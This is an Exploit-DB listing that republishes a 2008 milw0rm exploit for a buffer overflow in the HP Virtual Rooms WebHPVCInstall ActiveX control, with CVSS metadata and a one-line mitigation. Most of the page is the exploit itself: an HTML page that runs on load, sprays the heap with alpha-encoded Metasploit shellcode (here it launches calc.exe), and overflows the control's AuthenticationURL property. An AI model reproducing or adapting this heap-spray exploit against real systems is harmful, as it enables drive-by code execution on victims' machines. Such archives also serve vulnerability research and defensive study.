HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit

vendor:

Virtual Rooms

by:

e.b.

8.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Virtual Rooms

Affected Version From: 1.0.0.100

Affected Version To: 1.0.0.100

Patch Exists: Yes

Related CWE: N/A

CPE: a:hp:virtual_rooms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit

This exploit is for a buffer overflow vulnerability in the HP Virtual Rooms WebHPVCInstall Control. It was written by e.b. and tested on Windows XP SP2 (fully patched) English, IE6, and hpvirtualrooms14.dll version 1.0.0.100. It is not reliable due to heap fragmentation issues. Thanks to rgod, h.d.m. and the Metasploit crew.

Mitigation:

Update to the latest version of the HP Virtual Rooms WebHPVCInstall Control.

Source

Exploit-DB raw data:

<!-- 
HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
written by e.b.
Note that I did not have time to work out some heap fragmentation issues so this code is NOT reliable...
Tested on Windows XP SP2(fully patched) English, IE6, hpvirtualrooms14.dll version 1.0.0.100
Thanks to rgod, h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
   


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");



	var bigblock = unescape("%u9090%u9090");
	var headersize = 20;
	var slackspace = headersize + shellcode1.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;

	

	var memory = new Array();
	for (i = 0; i < 700; i++){ memory[i] = block + shellcode1 }
		
	var buf = "";
	for (i = 0; i < 15000; i++) { buf = buf + unescape("%u0A0A%u0A0A") }

 	obj.AuthenticationURL = buf;  
 } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:00000014-9593-4264-8B29-930B3E4EDCCD">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-22]